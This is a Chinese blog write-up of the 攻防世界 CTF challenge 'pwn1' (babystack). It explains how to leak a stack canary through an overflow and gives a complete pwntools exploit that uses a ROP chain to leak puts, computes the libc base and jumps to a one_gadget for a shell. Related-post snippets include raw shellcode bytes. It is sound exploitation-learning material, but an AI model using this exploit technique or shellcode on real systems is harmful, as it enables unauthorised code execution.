攻防世界 -pwn1

最新推荐文章于 2024-04-04 21:12:24 发布
最新推荐文章于 2024-04-04 21:12:24 发布
阅读量893 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30204577/article/details/105690104
版权

0x00 前言

首次做到跟canary绕过有关的知识,就准备写点东西记录下。

64位,保护几乎全开了。不慌,慌也没用。

0x10 分析

运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。

0x11 ida分析

main函数

在main函数中发现了canary, canary的值在程序每一次运行都是会改变的 ,我们便需要想办法获得canary,然后再输入进去以便与栈中原来保存的canary比较,若二者不一致的情况下,程序运行便会出错(call ___stack_chk_fail),一致则正常退出。

我们先看一下本题canary的检测情况:

程序首先将fs:28h处的内容赋给了rax,然后将rax中的内容给了[rbp+var_8]以保存(毕竟rax用到的地方很多,一直在rax里存着有点碍事)。

然后 程序又将 [rbp+var_8] 里的内容赋给了rcx,接着就让rcx与fs:28h里的内容进行异或,若结果为0,则进行正常的leave,否则则check_fail退出。

再看main函数,这次我们注意到s的长度为0x90,但是却可以输入0x100的长度,明显的栈溢出,又发现canary距离返回地址的长度为8。

0x90-8=0x88,之所以这样做是为了顺带将canary的值带出来,因为我们输入这么个长度之后,后面紧跟的是canary的值,当我们输入的长度为0x88时,会打破canary的结尾,这样puts就直接顺带着将canary的值带出来了,当我们输入的长度小于0x88时,结尾会有'\x00'截断,就不会影响到canary的值。

无图无真相:

这个图印证了两点:1、canary的值会每次都变化,2、确实可以带出来canary

好了,得到canary之后我们的任务便是接收canary然后重新输入进去与原来的canary进行比较。

execve取代binsh

本题使用的是execve,因为libc里无sh....使用one_gadget可方便地找出execve地址

0x20 exp及相关解释

##!/usr/bin/python
# -*- coding: UTF-8 -*-
from pwn import *
elf=ELF('./babystack')
libc=ELF('./libc-2.23.so')
p=remote('111.198.29.45',52070)
prdi_addr=0x0400a93
main_addr=0x0400908
one_gadget_addr=0x45216
put_plt=elf.plt['puts']#puts的plt表地址
put_got=elf.got['puts']#puts的got表地址,真实地址
p.sendlineafter('>> ','1')#发送1,进行存数
p.sendline('a'*0x88)
p.sendlineafter('>> ','2')
p.recvuntil('a'*0x88+'\n')
canary=u64(p.recv(7).rjust(8,'\x00'))#接收canary内容中的大部分然后补结尾符,因为我们输入的\n给它的结尾符搞没了
print hex(canary)#打印canary的值
p.sendlineafter('>> ','1')
payload='a'*0x88+p64(canary)+'a'*8+p64(prdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr)#'a'*8是canary举例返回地址的长度,需要被填充,pop rdi ret的意思是将后面的put_got作为第一个参数放入第一个参数寄存器rdi中,然后返回到put_plt让puts打印出其真实的地址,然后返回到main
p.sendline(payload)
p.recv()#recv的内容中就有puts的真实地址
p.sendlineafter('>> ','3')#结束了本次输入,为下一次完整输入做准备
put_addr=u64(p.recv(8).ljust(8,'\x00'))#获得put的真实地址
print hex(put_addr)
libc_base=put_addr-libc.symbols['puts']#获得libc的基址
execve_addr=libc_base+one_gadget_addr#获得execve的真实地址以便获取执行bin
p.sendlineafter('>> ','1')
payload1='a'*0x88+p64(canary)+'a'*8+p64(execve_addr)#执行execve
p.sendline(payload1)
p.sendlineafter('>> ','3')
p.interactive()

ok,到此结束。参考,补充自己的理解。

TedLau.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界--pwn1
qq_73149934的博客
02-22 476
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
攻防世界pwn——pwn1
qq_62076255的博客
12-21 427
做题记录
pwn--攻防世界 pwn1
最新发布
A13837377363的博客
04-04 420
canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。我使用的是python3,可能由于python版本问题,我运行的时候要将。然后是读取main函数的返回地址,与这个类似,就不赘述。一个非常便捷的工具。
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2849
get_shell
攻防世界pwn难度1
weixin_63282980的博客
11-05 1606
攻防世界难度1的题目WP
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1317
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 550
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
攻防世界 pwn1
10-25 959
1 题目 2 分析 流程很简单,提供三个功能,store print quit。store功能存在明显的溢出点: 接下来就是利用溢出点,将代码转跳到system方法执行即可。所以接下来的就要通过构造ROP将相对地址打印出来,然后溢出one_gadget.exp如下: from pwn import * from LibcSearcher import * io = remote("220.249.52.133","38178") context.log_level = 'debug.
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1307
学习pwn开始,慢慢来不要急
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 2776
攻防世界-Pwn-new-easypwn
[攻防世界 pwn]——pwn1(内涵peak小知识)
Y_peak的博客
02-28 579
[攻防世界 pwn]——pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇见printf函数,并且有格式化字符串漏洞的我们可以直接计算偏移利用%{offest}$s,打印出来。当然也可以用 % {offest} $p直接打印出canary 的值。 遇见可以利用的栈溢出gets函数,如果有puts函数,或者printf("%s", **)的我们也可以直接泄露出来它。首先我们要清
攻防世界 pwn——pwnstack
CNS-Enterprise BCC-1701-J
06-01 969
攻防世界 做题练习
攻防世界 pwnstack writeup
m0_73605862的博客
05-30 777
Step5:shift+F12查看字符串发现/bin/sh,进入发现后门函数,查看地址(ctr+x)发现为:0x400762。Step6:编写exp,输入后,ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list。Step4:进入vuln()函数查看一下,发现有一个buf,查看发现从0xA0到0x08。Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 1984
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值